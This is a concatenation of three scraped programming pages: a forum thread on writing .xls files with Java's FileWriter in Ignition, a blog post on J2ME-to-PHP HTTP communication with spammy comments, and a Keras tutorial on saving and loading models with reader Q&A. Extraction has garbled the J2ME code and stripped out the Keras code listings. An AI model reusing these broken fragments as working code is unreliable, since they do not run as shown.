Hi All, can you please help in suggesting syntax for saving .xls file to specific location in my system data=event.source.parent.getComponent(‘WMpwmName’).text filename = system.file.saveFile(“padid2excel.xls”) filePath = “E:\padid2excel.xls” if filename !=None: system.file.writeFile(filename, data) Hi All, Hi all, i want to save without user interference Thanks Use the FileWriter from the Java standard library: from java.io import File, FileWriter file = File(path) fw = FileWriter(file, False) fw.write(data) fw.close() Thanks lot bfuson!! is that possible to append data in same file ?? instead of opening new file ?? I am attempted to use new Filewriter(file,true) but it is throwing error. The error would be helpful, but if you are saving an XLS file then you cannot just append to the file. A structured document like most Office files requires that everything be saved in a particular way so appending would essentially make the file unreadable to Excel. Hi Philip, from java.io import File, FileWriter file = File(path) fw = FileWriter(file, true)>>>true is not defined" in line #3 fw.write(data) fw.close() file = File(path) fw = new FileWriter(file, true)>>>true is not defined" in line #3 fw.write(data) fw.close() Error was: “true is not defined” in line #3 I tried saving file as CSV instead of xls format, so that it will not throw prompt when opened. Please let me know if i can do it another way. Just a case-sensitivity issue in that case, try: FileWriter(file, True)
https://forum.inductiveautomation.com/t/save-xls-file-to-specific-path/17228
CC-MAIN-2021-39
refinedweb
258
68.16
Sometimes choose php page because, PHP server is most popular. Here is the J2ME Program: This program get a number from user and send this to the php page in server. Server read and send necessary output as a return . /* * Client.java * * Created on August 17, 2007, 11:42 AM */ import javax.microedition.midlet.*; import javax.microedition.lcdui.*; import java.io.*; import javax.microedition.io.*; /** * * @author ahsan * @version */ public class Client extends MIDlet implements CommandListener { private Display display; private Form form; private Command cQuit, cOk; private String url = ""; private String part=""; private TextField f; HttpConnection http; InputStream in; OutputStream out; int rc; public void startApp() { display = Display.getDisplay(this); form = new Form("Client"); cQuit = new Command("Quit", Command.EXIT, 1); cOk = new Command("OK", Command.OK, 1); f = new TextField("Query", "",10, TextField.NUMERIC); form.addCommand(cQuit); form.addCommand(cOk); form.setCommandListener(this); form.append(f); display.setCurrent(form); } public void processGet() throws Exception{ http = (HttpConnection) Connector.open(url+part);); } form.append(new StringItem("Response: ", buff.toString())); if (in != null) in.close(); if (out != null) out.close(); if (http != null) http.close(); } public void commandAction(Command com, Displayable d){ if (com == cQuit){ destroyApp(true); notifyDestroyed(); } else if (com == cOk){ part = f.getString().trim(); try{ processGet(); } catch(Exception o){ o.printStackTrace(); } } } public void pauseApp() { } public void destroyApp(boolean unconditional) { } } Now I have shown the PHP page that read the data from J2ME client and display the necessary output to the J2ME client’s display: hello.php <?php $response = "Hello, every body"; if (isset($_GET)){ switch($_GET["type"]){ case 1: $response = "Good Moring"; break; case 2: $response = "Good evening "; break; case 3: $response = "Visit:"; break; default: $response = "Hi to all" ; } } echo "$response"; ?> Please use this syntax in the php page when using POST method both in J2ME client and PHP page : if ($_SERVER['REQUEST_METHOD'] == 'POST') $str = trim(file_get_contents('php://input')); //get the raw POST data June 14, 2008 at 12:07 pm assalamu alaikum. Nice to see your works as a PHP and J2ME expert. Will u mind if you ask for some technical help in this domain? I am waiting to hear from u. December 25, 2008 at 6:32 am Hello! Thanks for the example above.. It works great. However, I’m a bit confused for the POST method. Is it possible for you to send me a piece of code? Thanks. March 4, 2009 at 9:03 am plz tell me the code for transmitting image from server and saving it to server using j2me and php… April 19, 2009 at 11:22 pm please help me to my project ; is to do a client (etudient) who acces to server for seeing his notes by j2me,thank you all. April 19, 2009 at 11:23 pm this my e-mail ; youcef.cherif@gmail.com May 8, 2009 at 3:53 pm Nice job this would be a great help to me for as i m connecting mysql and j2me via server side language as php as its most flexible….. 🙂 thanks May 8, 2009 at 3:54 pm i m wondering if you can send me the code for post method my mail id is tosha9@gmail.com…. December 15, 2009 at 7:11 am good Article January 17, 2010 at 4:59 pm Good one thank u May 21, 2010 at 5:47 pm Good work…but to avoid deadlock, allocate a separate worker thread for the http connection…otherwise the gui will become unresponsive here’s the modification: public void processGet() throws Exception{ // Create a thread to actually connect to the webserver Thread t = new Thread() { public void run() { try { http = (HttpConnection) Connector.open(url+part); http.setRequestMethod(HttpConnection.GET); …. } }; t.start(); } thanx February 1, 2011 at 11:22 am great Article March 9, 2011 at 7:32 pm Hi Great Job, am doing a research on remote monitoring using j2me as the client is a mobile device, i will be thankful if u show me how can u access a file through j2me? Much appreciated! October 15, 2011 at 11:01 am What is deferent between InputStream and dataInputStream, iam still confious with that.Thanks before June 7, 2013 at 4:58 pm This post, “Communication between J2ME client and PHP page in server | Think Different” was excellent. I’m making out a copy to show my personal pals. I appreciate it,Delila August 2, 2013 at 10:38 pm “Communication between J2ME client and PHP page in server | Think Different” was indeed a beneficial post. If solely there was significantly more weblogs like this specific one on the actual world wide web. Well, thanks for your personal precious time, Pamela August 3, 2013 at 6:34 am I personally speculate exactly why you titled this specific post, “Communication between J2ME client and PHP page in server | Think Different”. In any event I actually admired the post!Thanks for the post,Seth August 3, 2013 at 2:33 pm “Communication between J2ME client and PHP page in server | Think Different” really enables me imagine a little bit more. I adored every single portion of it. Thanks for your effort -Tawanna August 4, 2013 at 7:13 am “Communication between J2ME client and PHP page in server | Think Different” was indeed a truly nice blog post, . I hope you keep publishing and I’m going to continue to keep browsing! Thanks a lot ,Lance October 8, 2014 at 12:20 pm I am really grateful to the holder of this web page who has shared this great paragraph at at this place.
https://mahmudahsan.wordpress.com/2008/02/21/communication-between-j2me-client-and-php-page-in-server/
CC-MAIN-2017-13
refinedweb
924
60.85
occurs if a simple IP is created with an AXI interface with register access and soft reset, and if the "create a sample driver" box is ticked in the CIP wizard. If this project is exported to SDK with the driver included in the repository, or using the example code provided in the driver, the SDK will fail in libgen noting that the xio.h or the xbasic_types.h cannot be found, or that the <IP_NAME>_USER_NUM_REG cannot be defined. How can I fix this? This is a known issue. To fix the issue, open the driver source files created in the CIP wizard seen below; <IP_NAME>.h Change the following: #include "xio.h" #include "xbasic_types.h" #include "xil_io.h" #include "xil_types.h" <IP_NAME>selftest.c Change the following: #include "xio.h"to: #include "xil_io.h" #include "xil_types.h" and add: #define <IP_NAME>_USER_TEST_NAME <IP_NAME>_AXI_LITE_USER_NUM_REG
http://www.xilinx.com/support/answers/54352.html
CC-MAIN-2017-13
refinedweb
146
71.1
In the time of creating software products that need to be highly scalable, microservices app looks like the most simple solution to them all. During my journey as a software developer and working in a project which requires the software to accommodate nearly a million users on demand, I have seen and felt that microservices solve the ultimate problem of proper utilisation of resources and increase the scalability of different services. This removes coupling between different services and help them run independently. What is an API Gateway? One of the most fundamental requirement of creating a microservices is the API gateway. An API gateway is an infrastructure layer that sit in front of the microservices. Its purpose is to serve requests from the client by routing it to the right microservice. This article is about how to create a very simple Node.js microservices application with the help of Dockerized Express API Gateway Pre-Requisite This sample project requires few things. - Docker (V19.03.2 or above) installed in your machine. - Node v10 or above. - Basic knowledge of Docker commands. - Ngrok or any other free tunnelling services for exposing localhost to the web I am doing this project in Mac OSX 11.4. Getting the Docker Image of Express Gateway and running it. Run this below command in your terminal to pull the docker image. docker pull express-gateway After pulling the image, create a folder and name it Config. Open terminal in that folder and run the below commands. touch gateway.config.yml touch system.config.yml Firstly copy and paste the below YAML code in gateway.config.yml. (I used Sublime Text editor to do this, but any other text editor is fine) http: port: 8080 admin: port: 9876 host: localhost apiEndpoints: api: host: localhost paths: '/ip' serviceEndpoints: httpbin: url: '' policies: - basic-auth - cors - expression - key-auth - log - oauth2 - proxy - rate-limit pipelines: default: apiEndpoints: - api policies: # Uncomment `key-auth:` when instructed to in the Getting Started guide. # - key-auth: - proxy: - action: serviceEndpoint: httpbin changeOrigin: true Copy and paste the YAML code below in system.config.yml file. # Core db: redis: emulate: true namespace: EG #plugins: # express-gateway-plugin-example: # param1: 'param from system.config' crypto: cipherKey: sensitiveKey algorithm: aes256 saltRounds: 10 # OAuth2 Settings session: secret: keyboard cat resave: false saveUninitialized: false accessTokens: timeToExpiry: 7200000 refreshTokens: timeToExpiry: 7200000 authorizationCodes: timeToExpiry: 300000 Now create another folder, named models, in Config. Open terminal at models and run the below commands to create three files. touch applications.json touch credentials.json touch users.json Copy and paste the below code in applications.json. { "$id": "", "type": "object", "properties": { "name": { "type": "string" }, "redirectUri": { "type": "string", "format": "uri" } }, "required": [ "name" ] } After that copy and paste the below code in credentials.json { "$id": "", "type": "object", "definitions": { "credentialBase": { "type": "object", "properties": { "autoGeneratePassword": { "type": "boolean", "default": true }, "scopes": { "type": [ "string", "array" ], "items": { "type": "string" } } }, "required": [ "autoGeneratePassword" ] } }, "properties": { "basic-auth": { "allOf": [ { "$ref": "#/definitions/credentialBase" }, { "type": "object", "properties": { "passwordKey": { "type": "string", "default": "password" } }, "required": [ "passwordKey" ] } ] }, "key-auth": { "type": "object", "properties": { "scopes": { "type": [ "string", "array" ], "items": { "type": "string" } } } }, "jwt": { "type": "object", "properties": {} }, "oauth2": { "allOf": [ { "$ref": "#/definitions/credentialBase" }, { "type": "object", "properties": { "passwordKey": { "type": "string", "default": "secret" } }, "required": [ "passwordKey" ] } ] } } } Lastly copy and paste the below code for users.json { "$id": "", "type": "object", "properties": { "firstname": { "type": "string" }, "lastname": { "type": "string" }, "username": { "type": "string" }, "email": { "type": "string", "format": "email" }, "redirectUri": { "type": "string", "format": "uri" } }, "required": [ "username", "firstname", "lastname" ] } For this article, we will only focus on configuring the gateway.config.yml file. I will walk through that after setting up and running the docker. Now that our Config folder is all ready, run the below Docker command to spin up a Docker container. docker run -d --name express-gateway \ -v /Users/naseef/Config:/var/lib/eg \ -p 8080:8080 \ -p 9876:9876 \ express-gateway In order for our Express Gateway Docker container to work properly we need to mount a volume with configuration files and volumes. The Config folder will be mounted and it contains all the configuration files and volumes inside it. Please replace '/Users/naseef/Config' in the above Docker to your own path of Config folder. This should start and run the Docker container named express-gateway. To make sure it is running, run docker ps in the terminal and check. Creating two simple different microservices with two endpoints We are going to create two GET Endpoints to act as our microservices. Create a folder in any directory of your choice named Actor. Setup an Express server in this folder. I used npm init command to setup my package.json, but you can choose other ways to setup the Express server. Upon creating the package.json, run npm install express --save in Actor to install Express. Create a file named actor.js and paste the code below. let express = require('express'); let app = express(); app.listen(3000, () => { console.log("Server running on port 3000"); }); app.get("/actors", (req, res, next) => { let array_actors = [ "Tom Cruise", "Johnny Depp", "Di Caprio", "Russel Crowe", "Tom Hanks" ]; res.json(array_actors); }); Run node actor.js to start this server on port 3000 of localhost. Hit the browser (or use Postman) with this url.. The result should be like this. [ "Tom Cruise", "Johnny Depp", "Di Caprio", "Russel Crowe", "Tom Hanks" ] In the same way as above create Movie folder, setup an Express server and create a file named movie.js. Add the below code in the movie.js file let express = require('express'); let app = express(); app.listen(8000, () => { console.log("Server running on port 8000"); }); app.get("/movies", (req, res, next) => { let array_movies = [ "Mission Impossible", "Pirates of Carribean", "Inception", "Gladiator", "The Terminal" ]; res.json(array_movies); }); Run node movie.js to start this server on port 8000 of localhost. Hit the browser (or use Postman) with this url.. The output should be something like this. [ "Mission Impossible", "Pirates of Carribean", "Inception", "Gladiator", "The Terminal" ] Ngrok to expose the GET Endpoints in the web. Use Ngrok to expose port 3000 and 8000 in the web. If you have trouble running two Ngrok sessions at the same time, follow this link. I will leave the details of exposing the API in the web through Ngrok out of the scope of this tutorial. Upon exposing the endpoints with Ngrok, we have the below endpoints for the services. Movie services: Actor services: Now that we have two running microservices, it is time to configure our gateway.config.yml file to route both these services through our Dockerized Gateway. Configure gateway.config.yml file of Express Gateway The Express Gateway accepts requests from the clients and directs them to the microservice in charge of the particular request. For example, if a request is made through the gateway,, the request is directed to the actor microservice and a request such as is directed to the movie microservice. In summary, each request is accepted through a server and directed to their various host. Let’s set up our Docker to implement this. Expose the endpoints to the gateway - Navigate into Config folder - Open gateway.config.yml file. In the apiEndpoints section, we create an API endpoint named “actors”, define the host and path. The path defined is an array of paths we would like to match. This is to cover for all URLs that match the path pattern. Repeat the same for the movies endpoint. For further details about matching patterns for hostname and paths, check out the Express Gateway endpoint documentation. With these, the Express gateway can accept external APIs(request from the client) of these formats ‘’ or ‘*’ Create the Service Endpoints to the gateway The service endpoints are the endpoints of our microservices, in this case, the actor and the movie microservices. The external request from the API endpoints is directed to the service endpoints. In the serviceEndpoints section still in the same gateway.config.yml file, we create services and define their URLs. For actors, we call its service endpoints actorService and add its endpoints ‘’. Repeat the same for the movie service endpoint. Finishing up this long post! Now let’s tie up the API endpoints and the service endpoints. It is configured in the Pipelines section. This is where we connect the API endpoints and the service endpoints. You will find that a default has been pre-defined, so we need to just define ours. You can copy and paste the default pipeline and then change some of the details. We name our pipeline “actorPipeline”, add the endpoint name which is “actors”. Find the serviceEndpoint in the proxy policy of the actorPipeline pipeline and add our service endpoint name which is “actorService”. Repeat the procedure for the movie pipeline. http: port: 8080 admin: port: 9876 host: localhost apiEndpoints: api: host: localhost paths: '/ip' actors: host: localhost paths: ['/actors','/actors/*'] movies: host: localhost paths: ['/movies','/movies/*'] serviceEndpoints: httpbin: url: '' actorService: url: '' movieService: url: '' policies: - basic-auth - cors - expression - key-auth - log - oauth2 - proxy - rate-limit pipelines: actorPipeline: apiEndpoints: - actors policies: # Uncomment `key-auth:` when instructed to in the Getting Started guide. # - key-auth: - proxy: - action: serviceEndpoint: actorService changeOrigin: true moviePipeline: apiEndpoints: - movies policies: # Uncomment `key-auth:` when instructed to in the Getting Started guide. # - key-auth: - proxy: - action: serviceEndpoint: movieService changeOrigin: true default: apiEndpoints: - api policies: # Uncomment `key-auth:` when instructed to in the Getting Started guide. # - key-auth: - proxy: - action: serviceEndpoint: httpbin changeOrigin: true Now our whole system is ready. Save the gateway.config.yml file and restart the Docker container. docker restart express-gateway The Ngrok and Node services should be running. If all are functioning properly we should be getting proper output by using our URLS This is the end of this Microservice App creation with Dockerized Express-gateway. If you face any errors or any difficulties feel free to comment below. Thank you. Happy Coding Discussion (0)
https://practicaldev-herokuapp-com.global.ssl.fastly.net/naseef012/create-a-microservices-app-with-dockerized-express-api-gateway-1kf9
CC-MAIN-2021-39
refinedweb
1,629
56.55
Keras is a simple and powerful Python library for deep learning. Given that deep learning models can take hours, days and even weeks to train, it is important to know how to save and load them from disk. In this post, you will discover how you can save your Keras models to file and load them up again to make predictions. Let’s get started. - Update Mar 2017: Added instructions to install h5py first. Added missing brackets on final print statement in each example. - Update Mar/2017: Updated example for Keras 2.0.2, TensorFlow 1.0.1 and Theano 0.9.0. Save and Load Your Keras Deep Learning Models Photo by art_inthecity, some rights reserved. Tutorial Overview Keras separates the concerns of saving your model architecture and saving your model weights. Model weights are saved to HDF5 format. This is a grid format that is ideal for storing multi-dimensional arrays of numbers. The model structure can be described and saved using two different formats: JSON and YAML. In this post we are going to look at two examples of saving and loading your model to file: - Save Model to JSON. - Save Model to YAML. Each example will also demonstrate saving and loading your model weights to HDF5 formatted files. The examples will use the same simple network trained on the Pima Indians onset of diabetes binary classification dataset. This is a small dataset that contains all numerical data and is easy to work with. You can download this dataset and place it in your working directory with the filename “pima-indians-diabetes.csv“. Confirm that you have the latest version of Keras installed (v1.2.2 as of March 2017). Note: You may need to install h5py. Save Your Neural Network Model to JSON JSON is a simple file format for describing data hierarchically. Keras provides the ability to describe any model using JSON format with a to_json() function. This can be saved to file and later loaded via the model_from_json() function that will create a new model from the JSON specification. The. Running this example provides the output below. The JSON format of the model looks like the following: Save Your Neural Network Model to YAML This example is much the same as the above JSON example, except the YAML format is used for the model specification. The model is described using YAML, saved to file model.yaml and later loaded into a new model via the model_from_yaml() function. Weights are handled in the same way as above in HDF5 format as model.h5. Running the example displays the following output: The model described in YAML format looks like the following: Further Reading - How can I save a Keras model? in the Keras documentation. - About Keras models in the Keras documentation. Summary In this post, you discovered how to serialize your Keras deep learning models. You learned how you can save your trained models to files and later load them up and use them to make predictions. You also learned that model weights are easily stored using HDF5 format and that the network structure can be saved in either JSON or YAML format. Do you have any questions about saving your deep learning models am grateful you for sharing knowledge through this blog. It has been very helpful for me. Thank you for the effort. I have one question. When I am executing keras code to load YAML / JSON data i am seeing following error. Traceback (most recent call last): File “simple_rnn.py”, line 158, in loaded_model = model_from_yaml(loaded_model_yaml) File “/usr/local/lib/python2.7/dist-packages/Keras-1.0.4-py2.7.egg/keras/models.py”, line 26, in model_from_yaml return layer_from_config(config, custom_objects=custom_objects)/models.py”, line 781, in from_config layer = get_or_create_layer(first_layer) File “/usr/local/lib/python2.7/dist-packages/Keras-1.0.4-py2.7.egg/keras/models.py”, line 765, in get_or_create_layer layer = layer_from_config(layer_data)/engine/topology.py”, line 896, in from_config return cls(**config) File “/usr/local/lib/python2.7/dist-packages/Keras-1.0.4-py2.7.egg/keras/layers/recurrent.py”, line 290, in __init__ self.init = initializations.get(init) File “/usr/local/lib/python2.7/dist-packages/Keras-1.0.4-py2.7.egg/keras/initializations.py”, line 109, in get ‘initialization’, kwargs=kwargs) File “/usr/local/lib/python2.7/dist-packages/Keras-1.0.4-py2.7.egg/keras/utils/generic_utils.py”, line 14, in get_from_module str(identifier)) Exception: Invalid initialization: What could be the reason ? File is getting saved properly but at the time of loading model I am facing this issue. Can you please give me any pointers ? Thanks, Onkar Sorry Onkar, the fault is not clear. Are you able to execute the example in the tutorial OK? your code worked fine, I tried to add saving model to my code but the files were not actually created alyhough I got no error messages please advice walid I expect the files were created. Check your current working directory / the dir where the source code files are located. Hi Jason, Thanks for creating this valuable content. On my Mac (OSX10.11), the script ran fine until the last line, in which it gave a syntax error below: >>> print “%s: %.2f%%” % (loaded_model.metrics_names[1], score[1]*100) File “”, line 1 print “%s: %.2f%%” % (loaded_model.metrics_names[1], score[1]*100) ^ SyntaxError: invalid syntax What could be the issue here? Thanks, Peter Hi Peter, you may be on Python3, try adding brackets around the argument to the print functions. Hi, Your blog and books were great, and thanks much to you I finally got my project working in Keras. I can’t seem to find how to translate a Keras model in to a standalone code that can run without Keras installed. The best I could find was to learn TensorFlow, build an equivalent model in TF, then use TF to create standalone code. Does Keras not have such functionality? Thanks Hi, my understanding is that Keras is required to use the model in prediction. You could try to save the network weights and use them in your own code, but you are creating a lot of work for yourself. Hello Jason, Thanks for your great and very helpful website. Since in here you talked about how to save a model, I wanted to know how we can save an embedding layer in the way that can be seen in a regular word embeddings file (i.e. text file or txt format). Let’s assume we either learn these word embeddings in the model from scratch or we update those pre-trained ones which are fed in the first layer of the model. I truly appreciate your response in advance. Regards, Davood I’m not sure we need to save embedding layers Davood. I believe they are deterministic and can just be re-created. I guess we should be able to save word embeddings at one point (not needed always though!). To visualize/map them in a (2D) space or to test algebraic word analogies on them can be some examples of this need. I found the answer for this and I’m sharing this here: If we train an embedding layer emb (e.g. emb = Embedding(some_parameters_here) ), we can get the resulting word-by-dimension matrix by my_embeddings = emb.get_weights(). Then, we can do normal numpy things like np.save(“my_embeddings.npy”, my_matrix) to save this matrix; or use other built-in write_to_a_file functions in Python to store each line of this matrix along with its associated word. These words and their indices are typically stored in a word_index dictionary somewhere in the code. Very nice, thanks for sharing the specifics Davood. You are very welcome Jason. However I have another question here! Let’s assume we two columns of networks in keras and these two columns are exactly the same. These two are going to merge on the top and then feed into a dense layer which is the output layer in our model. My question is, while the first layer of each column here is an embedding layer, how can we share the the weights of the similar layers in the columns? No need to say that we set our embedding layers (first layers) in a way that we only have one embedding matrix. What I mean is shared embeddings, something like this: emb1 = Embedding(some_parameters_here) emb2 = emb1 # instead of emb2 = Embedding(some_other_parameters_here)). How about the other layers on top of these two embedding layers?! How to share their weights? Thanks for your answer in advance. Hmm, interesting Davood. I think, and could be wrong, that embedding layers are deterministic. They do not have state, only the weights in or out have state. Create two and use them side by side. Try it and see. I’d love to know how you go? Hi Jason, thanks for your share, it helps me a lot. I’d like to ask a question, why the optimizer while compiling the model is adam, but uses rmsprop instead while compiling the loaded_model? I would suggest trying many different optimizers and see what you like best / works best for your problem. I find ADAM is fast and gives good results. I have difficulties finding an answer to this question: when are weights initialized in keras? at compile time ? (probably not) on first epoch ? This is important when resuming learning Interesting question. I don’t know. If I had to guess, I would say at the model.compile() time when the data structures are created. It might be worth asking on the keras email list – I’d love to know the answer. Thank you for creating such great blog. I saved a model with mentioned code. But when I wanted to load it again, I faced following error. It seems the network architecture was not save correctly? ————————————————————————— Exception Traceback (most recent call last) in () 1 # load weights into new model —-> 2 modelN.load_weights(“model41.h5”) 3 print(“Loaded model from disk”) C:\Anaconda2\envs\py35\lib\site-packages\keras\engine\topology.py in load_weights(self, filepath, by_name) 2518 self.load_weights_from_hdf5_group_by_name(f) 2519 else: -> 2520 self.load_weights_from_hdf5_group(f) 2521 2522 if hasattr(f, ‘close’): C:\Anaconda2\envs\py35\lib\site-packages\keras\engine\topology.py in load_weights_from_hdf5_group(self, f) 2570 ‘containing ‘ + str(len(layer_names)) + 2571 ‘ layers into a model with ‘ + -> 2572 str(len(flattened_layers)) + ‘ layers.’) 2573 2574 # We batch weight value assignments in a single backend call Exception: You are trying to load a weight file containing 4 layers into a model with 5 layers. Hi Soheil, It looks like the network structure that you are loading the weights into does not match the structure of the weights. Double check that the network structure matches exactly the structure that you used when you saved the weights. You can even save this structure as a json or yaml file as well. Hi Jason, I have a question. Now that I have saved the model and the weights, is it possible for me to come back after a few days and train the model again with initial weights equal to the one I saved? Great question prajnya. You can load the saved weights and continue training/update with new data or start making predictions. Hi Jason, It is an amazing blog you have here. Thanks for the well documented works. I have a question regarding loading the model weights. Is there a way to save the weights into a variable rather than loading and assigning the weights to a different model? I wanted to do some operations on the weights associated with the intermediate hidden layer. I was anticipating on using ModelCheckpoint but I am a bit lost on reading weights from the hdf5 format and saving it to a variable. Could you please help me figure it out. Thanks Great question, sorry I have not done this. I expect you will be able to extract them using the Keras API, it might be worth looking at the source code on github. Hi Jason thanks a lot for your excellent tutorials! Very much appreciated… Regarding the saving and loading: It seems that Keras as of now saves model and weights in HD5 rather than only the weights. This results in a much simpler snippet for import / export: ——————————————————- from keras.models import load_model model.save(‘my_model.h5’) # creates a HDF5 file ‘my_model.h5’ del model # deletes the existing model # returns a compiled model # identical to the previous one model = load_model(‘my_model.h5’) ——————————————————- Thanks Patrick, I’ll investigate and look at updating the post soon. Getting this error: NameError: name ‘model_from_json’ is not defined Thanks in advance for any help on this. Confirm that you have Keras 1.2.2 or higher installed. I have saved my weights already in a txt file. Can I use it and load weights? You may be able, I don’t have an example off-hand, sorry. Hi Jason, Thankyou for this great tutorial. I want to convert this keras model(model.h5) to tensorflow model(filename.pb) because I want to use it in android. I have used the github code that is: ========================================= import keras import tensorflow from keras import backend as K from tensorflow.contrib.session_bundle import exporter from keras.models import model_from_config, Sequential print(“Loading model for exporting to Protocol Buffer format…”) model_path = “C:/Users/User/buildingrecog/model.h5” model = keras.models.load_model(model_path) K.set_learning_phase(0) # all new operations will be in test mode from now on sess = K.get_session() # serialize the model and get its weights, for quick re-building config = model.get_config() weights = model.get_weights() # re-build a model where the learning phase is now hard-coded to 0 new_model = Sequential.model_from_config(config) new_model.set_weights(weights) export_path = “C:/Users/User/buildingrecog/khi_buildings.pb” # where to save the exported graph export_version = 1 # version number (integer) saver = tensorflow.train.Saver(sharded=True) model_exporter = exporter.Exporter(saver) signature = exporter.classification_signature(input_tensor=model.input, scores_tensor=model.output) model_exporter.init(sess.graph.as_graph_def(), default_graph_signature=signature) model_exporter.export(export_path, tensorflow.constant(export_version), sess) ———————————————————————————– but has the following error… ===================== ————————————————————————— ValueError Traceback (most recent call last) in () 7 print(“Loading model for exporting to Protocol Buffer format…”) 8 model_path = “C:/Users/User/buildingrecog/model.h5” —-> 9 model = keras.models.load_model(model_path) 10 11 K.set_learning_phase(0) # all new operations will be in test mode from now on C:\Users\User\Anaconda3\lib\site-packages\keras\models.py in load_model(filepath, custom_objects) 228 model_config = f.attrs.get(‘model_config’) 229 if model_config is None: –> 230 raise ValueError(‘No model found in config file.’) 231 model_config = json.loads(model_config.decode(‘utf-8’)) 232 model = model_from_config(model_config, custom_objects=custom_objects) ValueError: No model found in config file. —————————————————————- Please help me to solve this…!! Sorry, I don’t know how to load keras models in tensorflow off-hand. M Amer, I ma trying to do exactly the same thing. Please let us know if you figure it out. Hi Jason, I have created the keras model file (.h5) unfortunately it can’t be loaded. But I want to load it and convert it into tensor flow (.pb) model.Any Solution? Waiting for your response…. Sorry, I don’t have an example of how to load a Keras model in TensorFlow. Hi Jason, I am having issues with loading the model which has been saved with normalising (StandardScaler) the columns. Do you have to apply normalising (StandarScaler) when you load the models too? Here is the snippet of code: 1) Save and 2)Load Save: import numpy as np import matplotlib.pyplot as plt import pandas as pd # Importing the dataset dataset = pd.read_csv(‘Churn]) onehotencoder = OneHotEncoder(categorical_features = [1]) X = onehotencoder.fit_transform(X).toarray() X = X[:, 1:] # Splitting the dataset into the Training set and Test set from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0) # Feature Scaling from sklearn.preprocessing import StandardScaler sc = StandardScaler() X_train = sc.fit_transform(X_train) X_test = sc.transform(X_test) # Importing the Keras libraries and packages import keras from keras.models import Sequential from keras.layers import Dense # Initialising the ANN classifier = Sequential() classifier.add(Dense(units = 6, kernel_initializer = ‘uniform’, activation = ‘relu’, input_dim = 11)) classifier.add(Dense(units = 6, kernel_initializer = ‘uniform’, activation = ‘relu’)) classifier.add(Dense(units = 1, kernel_initializer = ‘uniform’, activation = ‘sigmoid’)) classifier.compile(optimizer = ‘adam’, loss = ‘binary_crossentropy’, metrics = [‘accuracy’]) # Fitting the ANN to the Training set classifier.fit(X_train, y_train, batch_size = 10, epochs = 1) # Predicting the Test set results y_pred = classifier.predict(X_test) y_pred = (y_pred > 0.5) # Saving your model classifier.save(“ann_churn_model_v1.h5”) Load: import numpy as np import matplotlib.pyplot as plt import pandas as pd # Reuse churn_model_v1.h5 import keras from keras.models import load_model classifier = load_model(“ann_churn_model_v1.h5”) # Feature Scaling – Here I have a question whether to apply StandarScaler after loading the model? from sklearn.preprocessing import StandardScaler #sc = StandardScaler() new_prediction = classifier.predict(sc.transform(np.array([[0.0, 0.0, 600, 1, 40, 3, 60000, 2, 1, 1, 50000]]))) new_prediction = (new_prediction > 0.5) Thanks, Sanj You will also need to save your scaler. Perhaps you can pickle it or just the coefficients (min/max for each feature) needed to scale data. Thanks for the useful information. Is it possible to load this model and weights to any other platform, for example Android or iOS. I believe that model and weights are language independent. Are there any free / open source solutions for this purpose? I don’t see why not. Sorry, I not across the android or ios platforms. Hi Jason, How can I create a model out of face recognition encodings to save using Saver.save() method? What is Saver.save()? Hey Jason, have you tried saving a model, closing the python session, then opening a new python session and then loading a model? Using python 3.5, if I save a trained model in one session and load it in another, my accuracy drops dramatically and the predictions become random (as if the model wasn’t trained). This is what I’m trying to do: ”’ embedding_size = 64 hidden_size = 64 input_length = 100 learning_rate = 0.1 patience = 3 num_labels = 6 batch_size= 50 epochs = 100 seq_len = 100′ model = Sequential() model.add(Embedding(vocab_size, embedding_size, input_length=input_length)) model.add(Bidirectional(GRU(hidden_size, return_sequences=True, activation=”tanh”))) model.add(TimeDistributed(Dense(num_labels, activation=’softmax’))) optimizer = Adagrad(lr=learning_rate) model.compile(loss=’categorical_crossentropy’, optimizer=optimizer, metrics=[‘categorical_accuracy’]) callbacks = [EarlyStopping(monitor=’val_loss’, patience=patience, verbose=0)] model.fit(x_train, y_train, batch_size=batch_size, epochs = epochs, callbacks=callbacks, validation_data=[x_dev, y_dev]) model.save(“model.h5″) ”’ Evaluating the model in this point gives me accuracy of ~70. Then I exit python, open a new python session, and try: ”’ model2 = load_mode(‘model_full.h5′) ”’ Evaluating the model in this point gives me accuracy of ~20. Any ideas? I have. I don’t believe it is related to the Python session. Off the cuff, my gut tells me something is different in the saved model. If you save and load in the same session is the result the same as prior to the save? What if you repeat the load+test process a few times? Confirm that you are saving the Embedding as well (I think it may need to be saved). Confirm that you are evaluating it on exactly the same data in the same order and in the same way. Neural nets are stochastic and a deviation could affect the internal state of your RNN and result in different results, perhaps not as dramatic as you are reporting through. I seem to get an error message RuntimeError: Unable to create attribute (Object header message is too large) Github issues states that the error could be due to too large network, which is the case here.. but How should i then save the weights… Keras doesn’t seem to have any alternative methods.. Sorry, I have not seen this error. See if you can save the weights with a smaller network on your system to try and narrow down the cause of the fault. Hey guys, I want to know how can i update value of model, like i have better model, version 2 and not need to stop service, with use of version 1 before in Keras. I want to say a module manager model, can update new version model, and not need to break service, or something like this. Thank you. You have a few options. You can replace the weights and continue to use the topology. You can replace the topology and weights. You can also continue learning from the existing set of weights, see this post: Hi Jason, do you know if it’s possible saving the model only and every time it’s accuracy over the validation set has improved (after each epoch)? and is it possible checking the validation in a higher frequency than every epoch? thanks! I would expect so George, the callback is quite configurable: Hi Dr. Jason, I am using keras with Tensorflow back-end. I have saved my model as you mentioned here. But the problem was it takes some longer time than expected to load the weights. I am only using a CPU (not a GPU) since my model is kind of a small model. Can you please let me know how to improve the loading time of the model? Compared to sci-kit learn pickled model’s loading time, this is very high (nearly about 1 minute). That is a long time. Confirm that it is Keras causing the problem. Perhaps it is something else in your code? Perhaps you have a very slow HDD? Perhaps you are running out of RAM for some reason? Hi Jason, how can I save a model after gridsearch ? I keep getting errors: “AttributeError: ‘KerasClassifier’ object has no attribute ‘save'”
http://machinelearningmastery.com/save-load-keras-deep-learning-models/
CC-MAIN-2017-26
refinedweb
3,625
59.3
